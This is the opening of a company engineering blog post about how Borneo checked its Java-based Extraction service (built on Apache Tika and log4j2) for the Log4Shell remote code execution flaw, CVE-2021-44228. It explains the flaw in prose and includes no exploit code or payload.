How we determined whether our software is susceptible to the Log4Shell vulnerability, crafted a demo exploit, and then resolved the issue.
By now everyone should have heard of the recent zero-day remote code execution (RCE) vulnerability in the popular Apache Log4j library. First announced on December 9, 2021 on Twitter, and later published as CVE-2021–44228, this vulnerability has kept teams busy patching their services for the past month.
At Borneo, we do not use a lot of Java in our own software stack. So when checking how our Borneo software might be affected by this vulnerability, we could focus our attention on just a single microservice. This service, called the Extraction service, uses the open-source Apache Tika software library to extract plain text from various file formats such as PDFs, Office documents, etc. This is required for Borneo to detect sensitive information in such documents. And since Apache Tika is implemented in Java, this Extraction service was also implemented using the Java-based Spring Boot framework, and uses the vulnerable log4j2 library for logging.
Tl;dr — If a user of your application controls a string, that at any point gets included in a log message which gets logged using a vulnerable version of log4j, that user can instruct your application to load a piece of executable code from a remote server the user controls, and have it execute that code!